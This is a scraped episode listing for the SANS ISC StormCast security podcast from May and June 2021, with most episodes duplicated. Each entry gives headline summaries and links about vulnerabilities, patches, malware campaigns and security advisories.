Increase in UDP Port 389 Scans (LDAP/AD) https://isc.sans.edu/forums/diary/Is+this+traffic+bAD/27566/ CD/DVD Destruction https://isc.sans.edu/forums/diary/DIY+CDDVD+Destruction/27572/ Zyxel Exploits https://twitter.com/JAMESWT_MHT/status/1407987022170578946 https://kb.zyxel.com/KB/searchArticle!viewDetail.action?articleOid=018137&lang=EN Cisco Vulnerability Exploited https://threatpost.com/cisco-asa-bug-exploited-poc/167274/ Microsoft Signs Netfilter Rootkit https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit
6/28/20216 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, June 25th, 2021

Do You Like Cookies? Some are for sale! https://isc.sans.edu/forums/diary/Do+you+Like+Cookies+Some+are+for+sale/27558/ A supply-chain breach: Taking over an Atlassian account https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/23175805/Atlassian-ATO-CPR-blog-FINAL.pdf Dell Bios Connect Vulnerability https://eclypsium.com/2021/06/24/biosdisconnect/ ATM Jackpotting via NFC https://www.wired.com/story/atm-hack-nfc-bugs-point-of-sale/
6/25/20216 minutes, 20 seconds
Episode Artwork

ISC StormCast for Friday, June 25th, 2021

Do You Like Cookies? Some are for sale! https://isc.sans.edu/forums/diary/Do+you+Like+Cookies+Some+are+for+sale/27558/ A supply-chain breach: Taking over an Atlassian account https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/23175805/Atlassian-ATO-CPR-blog-FINAL.pdf Dell Bios Connect Vulnerability https://eclypsium.com/2021/06/24/biosdisconnect/ ATM Jackpotting via NFC https://www.wired.com/story/atm-hack-nfc-bugs-point-of-sale/
6/25/20216 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, June 24th, 2021

DNS Name Server Hijack Attack https://www.darkreading.com/vulnerabilities---threats/new-dns-name-server-hijack-attack-exposes-businesses-government-agencies/d/d-id/1341377 Paloalto Cortex XSOAR Vulnerablity https://security.paloaltonetworks.com/CVE-2021-3044 VMWare Carbon Black App Control Authentication Bypass https://www.vmware.com/security/advisories/VMSA-2021-0012.html? Standing With Security Researchers Against Misuse of the DMCA https://www.eff.org/deeplinks/2021/06/dmca-security-researcher-statement
6/24/20216 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, June 24th, 2021

DNS Name Server Hijack Attack https://www.darkreading.com/vulnerabilities---threats/new-dns-name-server-hijack-attack-exposes-businesses-government-agencies/d/d-id/1341377 Paloalto Cortex XSOAR Vulnerablity https://security.paloaltonetworks.com/CVE-2021-3044 VMWare Carbon Black App Control Authentication Bypass https://www.vmware.com/security/advisories/VMSA-2021-0012.html? Standing With Security Researchers Against Misuse of the DMCA https://www.eff.org/deeplinks/2021/06/dmca-security-researcher-statement
6/24/20216 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, June 23rd, 2021

Phishing asking recipients not to report abuse https://isc.sans.edu/forums/diary/Phishing+asking+recipients+not+to+report+abuse/27556/ PyPi Cryptomining Malware https://blog.sonatype.com/sonatype-catches-new-pypi-cryptomining-malware-via-automated-detection Dovecot TLS Implementation Vulnerability https://hackerone.com/reports/1204962 (see the link to the PDF for more details) Sonicwall Patch Incomplete https://www.tripwire.com/state-of-security/featured/analyzing-sonicwalls-unsuccessful-fix-for-cve-2020-5135/
6/23/20216 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, June 23rd, 2021

Phishing asking recipients not to report abuse https://isc.sans.edu/forums/diary/Phishing+asking+recipients+not+to+report+abuse/27556/ PyPi Cryptomining Malware https://blog.sonatype.com/sonatype-catches-new-pypi-cryptomining-malware-via-automated-detection Dovecot TLS Implementation Vulnerability https://hackerone.com/reports/1204962 (see the link to the PDF for more details) Sonicwall Patch Incomplete https://www.tripwire.com/state-of-security/featured/analyzing-sonicwalls-unsuccessful-fix-for-cve-2020-5135/
6/23/20216 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, June 22nd, 2021

Attack and Defend: Distributed Web Applications (free Webcast) https://www.sans.org/webcasts/attack-defend-modern-distributed-applications-119610 Darkside Impersonators https://www.helpnetsecurity.com/2021/06/21/impersonating-darkside/ Tesla RAT COVID-19 Vaccination Phish https://threatpost.com/agent-tesla-covid-vax-phish/167082/ Tor Browser Update https://www.bleepingcomputer.com/news/security/tor-browser-fixes-vulnerability-that-tracks-you-using-installed-apps/ Schneider PowerLogic Vulnerabilities https://www.ehackingnews.com/2021/06/six-major-flaws-identified-in-schneider.html AutoCAD Update https://www.autodesk.com/trust/security-advisories/adsk-sa-2021-0004
6/22/20215 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, June 22nd, 2021

Attack and Defend: Distributed Web Applications (free Webcast) https://www.sans.org/webcasts/attack-defend-modern-distributed-applications-119610 Darkside Impersonators https://www.helpnetsecurity.com/2021/06/21/impersonating-darkside/ Tesla RAT COVID-19 Vaccination Phish https://threatpost.com/agent-tesla-covid-vax-phish/167082/ Tor Browser Update https://www.bleepingcomputer.com/news/security/tor-browser-fixes-vulnerability-that-tracks-you-using-installed-apps/ Schneider PowerLogic Vulnerabilities https://www.ehackingnews.com/2021/06/six-major-flaws-identified-in-schneider.html AutoCAD Update https://www.autodesk.com/trust/security-advisories/adsk-sa-2021-0004
6/22/20215 minutes, 28 seconds
Episode Artwork

ISC StormCast for Monday, June 21st, 2021

Network Forensics on Azure VMs (Part #2) https://isc.sans.edu/forums/diary/Network+Forensics+on+Azure+VMs+Part+2/27538/ Google Open Redirect Being Abused https://isc.sans.edu/forums/diary/Open+redirects+and+why+Phishers+love+them/27542/ Easy Access to the NIST RDS Database https://isc.sans.edu/forums/diary/Easy+Access+to+the+NIST+RDS+Database/27544/ iOS Wifi Bug https://blog.chichou.me/2021/06/20/quick-analysis-wifid/ NSA VoIP Security Guide https://media.defense.gov/2021/Jun/17/2002744054/-1/-1/1/CTR_DEPLOYING%20SECURE%20VVOIP%20SYSTEMS.PDF
6/21/20215 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, June 21st, 2021

Network Forensics on Azure VMs (Part #2) https://isc.sans.edu/forums/diary/Network+Forensics+on+Azure+VMs+Part+2/27538/ Google Open Redirect Being Abused https://isc.sans.edu/forums/diary/Open+redirects+and+why+Phishers+love+them/27542/ Easy Access to the NIST RDS Database https://isc.sans.edu/forums/diary/Easy+Access+to+the+NIST+RDS+Database/27544/ iOS Wifi Bug https://blog.chichou.me/2021/06/20/quick-analysis-wifid/ NSA VoIP Security Guide https://media.defense.gov/2021/Jun/17/2002744054/-1/-1/1/CTR_DEPLOYING%20SECURE%20VVOIP%20SYSTEMS.PDF
6/21/20215 minutes, 40 seconds
Episode Artwork

ISC StormCast for Friday, June 18th, 2021

Network Forensics on Azure VMs https://isc.sans.edu/forums/diary/Network+Forensics+on+Azure+VMs+Part+1/27536/ Fake Ledger Hardware Wallets https://www.ledger.com/phishing-campaigns-status#phishing-campaigns https://www.reddit.com/r/ledgerwallet/comments/o154gz/package_from_ledger_is_this_legit/ Zoll Defibrilator Dashboard Vulnerability https://us-cert.cisa.gov/ics/advisories/icsma-21-161-01 Akamai Prolexic Outage https://threatpost.com/hiccup-akamais-ddos-outages/167004/
6/18/20215 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, June 18th, 2021

Network Forensics on Azure VMs https://isc.sans.edu/forums/diary/Network+Forensics+on+Azure+VMs+Part+1/27536/ Fake Ledger Hardware Wallets https://www.ledger.com/phishing-campaigns-status#phishing-campaigns https://www.reddit.com/r/ledgerwallet/comments/o154gz/package_from_ledger_is_this_legit/ Zoll Defibrilator Dashboard Vulnerability https://us-cert.cisa.gov/ics/advisories/icsma-21-161-01 Akamai Prolexic Outage https://threatpost.com/hiccup-akamais-ddos-outages/167004/
6/18/20215 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, June 17th, 2021

June 2021 Forensic Quiz https://isc.sans.edu/forums/diary/June+2021+Forensic+Contest/27532/ ThroughTek IP Camera SDK Vulnerability https://www.nozominetworks.com/blog/new-iot-security-risk-throughtek-p2p-supply-chain-vulnerability/ Peleoton Insecure Boot Vulnerability https://www.mcafee.com/blogs/other-blogs/mcafee-labs/a-new-program-for-your-peloton-whether-you-like-it-or-not/ Microsoft Defender for Endpoint Detecting Jailbroken Devices https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-new-capabilities-on-android-and-ios/ba-p/2442730
6/17/20215 minutes, 26 seconds
Episode Artwork

ISC StormCast for Thursday, June 17th, 2021

June 2021 Forensic Quiz https://isc.sans.edu/forums/diary/June+2021+Forensic+Contest/27532/ ThroughTek IP Camera SDK Vulnerability https://www.nozominetworks.com/blog/new-iot-security-risk-throughtek-p2p-supply-chain-vulnerability/ Peleoton Insecure Boot Vulnerability https://www.mcafee.com/blogs/other-blogs/mcafee-labs/a-new-program-for-your-peloton-whether-you-like-it-or-not/ Microsoft Defender for Endpoint Detecting Jailbroken Devices https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-new-capabilities-on-android-and-ios/ba-p/2442730
6/17/20215 minutes, 26 seconds
Episode Artwork

ISC StormCast for Wednesday, June 16th, 2021

Multi Perimeter Device Exploit Mirai Version Hunting For Sonicwall, DLink, Cisco and more https://isc.sans.edu/forums/diary/Multi+Perimeter+Device+Exploit+Mirai+Version+Hunting+For+Sonicwall+DLink+Cisco+and+more/27528/ Google Open Sourcing Homomorphic Encrypion Libraries https://developers.googleblog.com/2021/06/our-latest-updates-on-fully-homomorphic-encryption.html Stealing Tokens, emails, files and more in Microsoft Teams https://medium.com/tenable-techblog/stealing-tokens-emails-files-and-more-in-microsoft-teams-through-malicious-tabs-a7e5ff07b138
6/16/20216 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, June 16th, 2021

Multi Perimeter Device Exploit Mirai Version Hunting For Sonicwall, DLink, Cisco and more https://isc.sans.edu/forums/diary/Multi+Perimeter+Device+Exploit+Mirai+Version+Hunting+For+Sonicwall+DLink+Cisco+and+more/27528/ Google Open Sourcing Homomorphic Encrypion Libraries https://developers.googleblog.com/2021/06/our-latest-updates-on-fully-homomorphic-encryption.html Stealing Tokens, emails, files and more in Microsoft Teams https://medium.com/tenable-techblog/stealing-tokens-emails-files-and-more-in-microsoft-teams-through-malicious-tabs-a7e5ff07b138
6/16/20216 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, June 15th, 2021

Apple iOS 12.5.4 Security Update https://support.apple.com/en-us/HT212548 NIST.gov DNS Issues https://puck.nether.net/pipermail/outages/2021-June/013670.html Akkadian Provisioning Manager Multiple Vulnerabilities https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ Bypassing MFA in Exchange Online https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/
6/15/20215 minutes, 38 seconds
Episode Artwork

ISC StormCast for Tuesday, June 15th, 2021

Apple iOS 12.5.4 Security Update https://support.apple.com/en-us/HT212548 NIST.gov DNS Issues https://puck.nether.net/pipermail/outages/2021-June/013670.html Akkadian Provisioning Manager Multiple Vulnerabilities https://www.rapid7.com/blog/post/2021/06/08/akkadian-provisioning-manager-multiple-vulnerabilities-disclosure/ Bypassing MFA in Exchange Online https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/
6/15/20215 minutes, 38 seconds
Episode Artwork

ISC StormCast for Monday, June 14th, 2021

EoL SonicWall SRA 4600 VPN Gateways Exploited in Current Attacks https://isc.sans.edu/forums/diary/Sonicwall+SRA+4600+Targeted+By+an+Old+Vulnerability/27518/ Older Fortinet Vulnerability Still Exploited https://isc.sans.edu/forums/diary/Fortinet+Targeted+for+Unpatched+SSL+VPN+Discovery+Activity/27520/ PrivacyMic: Utlizing Inaudible Frequencies for Privacy Preserving Daily Activity Recognition http://alansonsample.com/publications/docs/2021%20-%20CHI%20-%20PrivacyMic-%20Utilizing%20Inaudible%20Frequencies%20for%20Privacy%20Preserving%20Daily%20Activity%20Recognition.pdf Linux Vulnerability in polkit https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
6/14/20216 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, June 14th, 2021

EoL SonicWall SRA 4600 VPN Gateways Exploited in Current Attacks https://isc.sans.edu/forums/diary/Sonicwall+SRA+4600+Targeted+By+an+Old+Vulnerability/27518/ Older Fortinet Vulnerability Still Exploited https://isc.sans.edu/forums/diary/Fortinet+Targeted+for+Unpatched+SSL+VPN+Discovery+Activity/27520/ PrivacyMic: Utlizing Inaudible Frequencies for Privacy Preserving Daily Activity Recognition http://alansonsample.com/publications/docs/2021%20-%20CHI%20-%20PrivacyMic-%20Utilizing%20Inaudible%20Frequencies%20for%20Privacy%20Preserving%20Daily%20Activity%20Recognition.pdf Linux Vulnerability in polkit https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
6/14/20216 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, June 11th, 2021

Are Cookie Banners a Waste of Time or a Complete Waste of Time? https://isc.sans.edu/forums/diary/Are+Cookie+Banners+a+Waste+of+Time+or+a+Complete+Waste+of+Time/27436/ Citrix Application Delivery Controller Vulnerability https://support.citrix.com/article/CTX297155 VoIP Monitor GUI XSS https://www.rtcsec.com/post/2021/06/abusing-sip-for-cross-site-scripting-most-definitely/ Denial of Service Vulnerabilitiesin RabbitMQ, EMQ X,and VeneMQ https://www.synopsys.com/blogs/software-security/cyrc-advisory-rabbitmq-emqx-vernemq/
6/11/20216 minutes, 39 seconds
Episode Artwork

ISC StormCast for Friday, June 11th, 2021

Are Cookie Banners a Waste of Time or a Complete Waste of Time? https://isc.sans.edu/forums/diary/Are+Cookie+Banners+a+Waste+of+Time+or+a+Complete+Waste+of+Time/27436/ Citrix Application Delivery Controller Vulnerability https://support.citrix.com/article/CTX297155 VoIP Monitor GUI XSS https://www.rtcsec.com/post/2021/06/abusing-sip-for-cross-site-scripting-most-definitely/ Denial of Service Vulnerabilitiesin RabbitMQ, EMQ X,and VeneMQ https://www.synopsys.com/blogs/software-security/cyrc-advisory-rabbitmq-emqx-vernemq/
6/11/20216 minutes, 39 seconds
Episode Artwork

ISC StormCast for Thursday, June 10th, 2021

Architecture, Compilers and Black Magic https://isc.sans.edu/forums/diary/Architecture+compilers+and+black+magic+or+what+else+affects+the+ability+of+AVs+to+detect+malicious+files/27510/ ALPACA TLS Attack https://alpaca-attack.com/ALPACA.pdf Google Chrome Update https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html
6/10/20215 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, June 10th, 2021

Architecture, Compilers and Black Magic https://isc.sans.edu/forums/diary/Architecture+compilers+and+black+magic+or+what+else+affects+the+ability+of+AVs+to+detect+malicious+files/27510/ ALPACA TLS Attack https://alpaca-attack.com/ALPACA.pdf Google Chrome Update https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop.html
6/10/20215 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, June 9th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+June+2021+Patch+Tuesday/27506/ PuzzleMaker Attacks With Chrome Zero-Day Exploit Chain https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/ Intel Patches https://www.intel.com/content/www/us/en/security-center/default.html Adobe Updates https://helpx.adobe.com/security.html Let's Encrypt and CentOS 7 https://blog.devgenius.io/lets-encrypt-change-affects-openssl-1-0-x-and-centos-7-49bd66016af3
6/9/20216 minutes, 42 seconds
Episode Artwork

ISC StormCast for Wednesday, June 9th, 2021

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+June+2021+Patch+Tuesday/27506/ PuzzleMaker Attacks With Chrome Zero-Day Exploit Chain https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/ Intel Patches https://www.intel.com/content/www/us/en/security-center/default.html Adobe Updates https://helpx.adobe.com/security.html Let's Encrypt and CentOS 7 https://blog.devgenius.io/lets-encrypt-change-affects-openssl-1-0-x-and-centos-7-49bd66016af3
6/9/20216 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, June 8th, 2021

Amazon Sidewalk https://isc.sans.edu/forums/diary/Amazon+Sidewalk+Cutting+Through+the+Hype/27502/ Windows Container Malware https://unit42.paloaltonetworks.com/siloscape/ Darkside Ransom Confiscated https://www.documentcloud.org/documents/20799023-affidavit-1-in-application-by-the-united-states-for-a-seizure-warrant-for-one-account-for-investigation-of-18-usc-ss-981a1a-and-other-offenses-nd-cal-321-mj-70945
6/8/20215 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, June 8th, 2021

Amazon Sidewalk https://isc.sans.edu/forums/diary/Amazon+Sidewalk+Cutting+Through+the+Hype/27502/ Windows Container Malware https://unit42.paloaltonetworks.com/siloscape/ Darkside Ransom Confiscated https://www.documentcloud.org/documents/20799023-affidavit-1-in-application-by-the-united-states-for-a-seizure-warrant-for-one-account-for-investigation-of-18-usc-ss-981a1a-and-other-offenses-nd-cal-321-mj-70945
6/8/20215 minutes, 56 seconds
Episode Artwork

ISC StormCast for Monday, June 7th, 2021

Strange Goings on With Port 37 https://isc.sans.edu/forums/diary/Strange+goings+on+with+port+37/27496/ QNAP Video Station RCE Vulnerability https://www.qnap.com/de-de/security-advisory/qsa-21-21 Updated GitHub Policy https://github.blog/2021-06-04-updates-to-our-policies-regarding-exploits-malware-and-vulnerability-research/ Cisco WebEx Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-player-kOf8zVT VMWare vCenter Server Vulnerability Actively Exploited https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html
6/7/20214 minutes, 57 seconds
Episode Artwork

ISC StormCast for Monday, June 7th, 2021

Strange Goings on With Port 37 https://isc.sans.edu/forums/diary/Strange+goings+on+with+port+37/27496/ QNAP Video Station RCE Vulnerability https://www.qnap.com/de-de/security-advisory/qsa-21-21 Updated GitHub Policy https://github.blog/2021-06-04-updates-to-our-policies-regarding-exploits-malware-and-vulnerability-research/ Cisco WebEx Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-player-kOf8zVT VMWare vCenter Server Vulnerability Actively Exploited https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html
6/7/20214 minutes, 57 seconds
Episode Artwork

ISC StormCast for Friday, June 4th, 2021

Script to Test CIS Zoom Benchmark https://github.com/turbot/steampipe-mod-zoom-compliance F5 BIG-IP Edge Client for Windows Vulnerability https://support.f5.com/csp/article/K20346072 Fancy Product Designer Wordpress Plugin Vulnerability https://www.welivesecurity.com/2021/06/03/zero-day-popular-wordpress-plugin-exploited-take-over-websites/ WordPress Pushes Jetpack Plugin Patch https://www.bleepingcomputer.com/news/security/wordpress-force-installs-jetpack-security-update-on-5-million-sites/ We.Lock Vulnerability https://github.com/CriticalSecurity/welock
6/4/20216 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, June 4th, 2021

Script to Test CIS Zoom Benchmark https://github.com/turbot/steampipe-mod-zoom-compliance F5 BIG-IP Edge Client for Windows Vulnerability https://support.f5.com/csp/article/K20346072 Fancy Product Designer Wordpress Plugin Vulnerability https://www.welivesecurity.com/2021/06/03/zero-day-popular-wordpress-plugin-exploited-take-over-websites/ WordPress Pushes Jetpack Plugin Patch https://www.bleepingcomputer.com/news/security/wordpress-force-installs-jetpack-security-update-on-5-million-sites/ We.Lock Vulnerability https://github.com/CriticalSecurity/welock
6/4/20216 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, June 3rd, 2021

Realtek RTL8170C Vulnerabilities https://www.vdoo.com/blog/realtek-wifi-vulnerabilities-zero-day Huawei LTE USB Stick E3372 Vulnerablity https://www.theregister.com/2021/06/02/huawei_lte_usb_stick_vulnerability/ NortonLifeLock Crypto https://investor.nortonlifelock.com/About/Investors/press-releases/press-release-details/2021/NortonLifeLock-Unveils-Norton-Crypto/default.aspx OpenPGP RNP Patch https://www.rnpgp.org/advisories/ri-2021-001/
6/3/20215 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, June 3rd, 2021

Realtek RTL8170C Vulnerabilities https://www.vdoo.com/blog/realtek-wifi-vulnerabilities-zero-day Huawei LTE USB Stick E3372 Vulnerablity https://www.theregister.com/2021/06/02/huawei_lte_usb_stick_vulnerability/ NortonLifeLock Crypto https://investor.nortonlifelock.com/About/Investors/press-releases/press-release-details/2021/NortonLifeLock-Unveils-Norton-Crypto/default.aspx OpenPGP RNP Patch https://www.rnpgp.org/advisories/ri-2021-001/
6/3/20215 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, June 2nd, 2021

Guildma is now using Finger and Signed Binary Proxy Execution to Evade Defenses https://isc.sans.edu/forums/diary/Guildma+is+now+using+Finger+and+Signed+Binary+Proxy+Execution+to+evade+defenses/27482/ Bypassing Protected Folders Protections https://dl.acm.org/doi/10.1145/3431286 Firefox 89 Released https://www.mozilla.org/en-US/security/advisories/mfsa2021-23/ Microsoft Edge Will make https default https://blogs.windows.com/msedgedev/2021/06/01/available-for-preview-automatic-https-helps-keep-your-browsing-more-secure/
6/2/20216 minutes, 12 seconds
Episode Artwork

ISC StormCast for Wednesday, June 2nd, 2021

Guildma is now using Finger and Signed Binary Proxy Execution to Evade Defenses https://isc.sans.edu/forums/diary/Guildma+is+now+using+Finger+and+Signed+Binary+Proxy+Execution+to+evade+defenses/27482/ Bypassing Protected Folders Protections https://dl.acm.org/doi/10.1145/3431286 Firefox 89 Released https://www.mozilla.org/en-US/security/advisories/mfsa2021-23/ Microsoft Edge Will make https default https://blogs.windows.com/msedgedev/2021/06/01/available-for-preview-automatic-https-helps-keep-your-browsing-more-secure/
6/2/20216 minutes, 12 seconds
Episode Artwork

ISC StormCast for Tuesday, June 1st, 2021

Malicious PowerShell Hosted on script.google.com https://isc.sans.edu/forums/diary/Malicious+PowerShell+Hosted+on+scriptgooglecom/27468/ Sonicwall Advisory https://www.sonicwall.com/support/product-notification/security-advisory-on-prem-sonicwall-network-security-manager-nsm-command-injection-vulnerability/210525121534120/ Hewlett Packard Enterprise Systems Insight Manger (SIM) Advisory https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04068en_us Memory Protection Bypass in Siemens PLCs https://claroty.com/2021/05/28/blog-research-race-to-native-code-execution-in-plcs/
6/1/20214 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, June 1st, 2021

Malicious PowerShell Hosted on script.google.com https://isc.sans.edu/forums/diary/Malicious+PowerShell+Hosted+on+scriptgooglecom/27468/ Sonicwall Advisory https://www.sonicwall.com/support/product-notification/security-advisory-on-prem-sonicwall-network-security-manager-nsm-command-injection-vulnerability/210525121534120/ Hewlett Packard Enterprise Systems Insight Manger (SIM) Advisory https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04068en_us Memory Protection Bypass in Siemens PLCs https://claroty.com/2021/05/28/blog-research-race-to-native-code-execution-in-plcs/
6/1/20214 minutes, 59 seconds
Episode Artwork

ISC StormCast for Friday, May 28th, 2021

AV evasion with 64-bit Executables https://isc.sans.edu/forums/diary/All+your+Base+arenearly+equal+when+it+comes+to+AV+evasion+but+64bit+executables+are+not/27466/ Unpatches WebKit Vulnerablity in iOS/macOS https://blog.theori.io/research/webkit-type-confusion/ VSCode Extension Vulnerabilities https://snyk.io/blog/visual-studio-code-extension-security-vulnerabilities-deep-dive/ M1RACLES https://m1racles.com
5/28/20216 minutes, 58 seconds
Episode Artwork

ISC StormCast for Friday, May 28th, 2021

AV evasion with 64-bit Executables https://isc.sans.edu/forums/diary/All+your+Base+arenearly+equal+when+it+comes+to+AV+evasion+but+64bit+executables+are+not/27466/ Unpatches WebKit Vulnerablity in iOS/macOS https://blog.theori.io/research/webkit-type-confusion/ VSCode Extension Vulnerabilities https://snyk.io/blog/visual-studio-code-extension-security-vulnerabilities-deep-dive/ M1RACLES https://m1racles.com
5/28/20216 minutes, 58 seconds
Episode Artwork

ISC StormCast for Thursday, May 27th, 2021

A Survey of Bluetooth Vulnerabilities https://isc.sans.edu/forums/diary/A+Survey+of+Bluetooth+Vulnerabilities+Trends/27460/ Google Chrome Update https://chromereleases.googleblog.com/2021/05/stable-channel-update-for-desktop_25.html Attacks on PDF Certification https://www.pdf-insecurity.org nginx vulnerability https://x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/
5/27/20215 minutes, 57 seconds
Episode Artwork

ISC StormCast for Thursday, May 27th, 2021

A Survey of Bluetooth Vulnerabilities https://isc.sans.edu/forums/diary/A+Survey+of+Bluetooth+Vulnerabilities+Trends/27460/ Google Chrome Update https://chromereleases.googleblog.com/2021/05/stable-channel-update-for-desktop_25.html Attacks on PDF Certification https://www.pdf-insecurity.org nginx vulnerability https://x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/
5/27/20215 minutes, 57 seconds
Episode Artwork

ISC StormCast for Wednesday, May 26th, 2021

Uncovering Shenenigans in an IP Address Block via Hurricane Electic's BGP Toolkit https://isc.sans.edu/forums/diary/Uncovering+Shenanigans+in+an+IP+Address+Block+via+Hurricane+Electrics+BGP+Toolkit/27456/ VMware Advisory https://www.vmware.com/security/advisories/VMSA-2021-0010.html Trend Micro Bugs https://blog.talosintelligence.com/2021/05/vuln-spotlight-trend-i.html
5/26/20214 minutes, 59 seconds
Episode Artwork

ISC StormCast for Wednesday, May 26th, 2021

Uncovering Shenenigans in an IP Address Block via Hurricane Electic's BGP Toolkit https://isc.sans.edu/forums/diary/Uncovering+Shenanigans+in+an+IP+Address+Block+via+Hurricane+Electrics+BGP+Toolkit/27456/ VMware Advisory https://www.vmware.com/security/advisories/VMSA-2021-0010.html Trend Micro Bugs https://blog.talosintelligence.com/2021/05/vuln-spotlight-trend-i.html
5/26/20214 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, May 25th, 2021

Apple Patches 0-Days https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/ https://support.apple.com/en-us/HT201222 Bluetooth Vulnerabilities https://kb.cert.org/vuls/id/799380 https://francozappa.github.io/about-bias/publication/antonioli-20-bias/antonioli-20-bias.pdf NAGIOS Vulnerabilities https://skylightcyber.com/2021/05/20/13-nagios-vulnerabilities-7-will-shock-you/
5/25/20214 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, May 25th, 2021

Apple Patches 0-Days https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/ https://support.apple.com/en-us/HT201222 Bluetooth Vulnerabilities https://kb.cert.org/vuls/id/799380 https://francozappa.github.io/about-bias/publication/antonioli-20-bias/antonioli-20-bias.pdf NAGIOS Vulnerabilities https://skylightcyber.com/2021/05/20/13-nagios-vulnerabilities-7-will-shock-you/
5/25/20214 minutes, 56 seconds
Episode Artwork

ISC StormCast for Monday, May 24th, 2021

Serverless Phishing Campaign https://isc.sans.edu/forums/diary/Serverless+Phishing+Campaign/27446/ Locking Kernel32.dll As Anti-Debugging Technique https://isc.sans.edu/forums/diary/Locking+Kernel32dll+As+AntiDebugging+Technique/27444/ WinRM Vulnerable to http.sys Vulnerability https://twitter.com/JimDinMN/status/1395071966487269376 Mozilla Firefox "Content-Type Confusion" Unsafe Code Execution https://besteffortteam.it/mozilla-firefox-content-type-confusion-unsafe-code-execution/
5/24/20216 minutes, 25 seconds
Episode Artwork

ISC StormCast for Monday, May 24th, 2021

Serverless Phishing Campaign https://isc.sans.edu/forums/diary/Serverless+Phishing+Campaign/27446/ Locking Kernel32.dll As Anti-Debugging Technique https://isc.sans.edu/forums/diary/Locking+Kernel32dll+As+AntiDebugging+Technique/27444/ WinRM Vulnerable to http.sys Vulnerability https://twitter.com/JimDinMN/status/1395071966487269376 Mozilla Firefox "Content-Type Confusion" Unsafe Code Execution https://besteffortteam.it/mozilla-firefox-content-type-confusion-unsafe-code-execution/
5/24/20216 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, May 21st, 2021

New YouTube Video Series: Everything you ever wanted to know about DNS and more https://isc.sans.edu/forums/diary/New+YouTube+Video+Series+Everything+you+ever+wanted+to+know+about+DNS+and+more/27440/ And Ransomware Just Got a Bit Meaner https://isc.sans.edu/forums/diary/And+Ransomware+Just+Got+a+Bit+Meaner+yes+it+is+possible/27438/ Attackers Scanned for Exchange Servers Five Minutes after Patch Release https://www.ehackingnews.com/2021/05/microsoft-exchange-bug-report-allowed.html GPS For Authentication: Is the Juice Worth the Squeeze @sans_edu https://www.sans.org/reading-room/whitepapers/authentication/gps-authentication-juice-worth-squeeze-40270
5/21/202119 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, May 21st, 2021

New YouTube Video Series: Everything you ever wanted to know about DNS and more https://isc.sans.edu/forums/diary/New+YouTube+Video+Series+Everything+you+ever+wanted+to+know+about+DNS+and+more/27440/ And Ransomware Just Got a Bit Meaner https://isc.sans.edu/forums/diary/And+Ransomware+Just+Got+a+Bit+Meaner+yes+it+is+possible/27438/ Attackers Scanned for Exchange Servers Five Minutes after Patch Release https://www.ehackingnews.com/2021/05/microsoft-exchange-bug-report-allowed.html GPS For Authentication: Is the Juice Worth the Squeeze @sans_edu https://www.sans.org/reading-room/whitepapers/authentication/gps-authentication-juice-worth-squeeze-40270
5/21/202119 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, May 20th, 2021

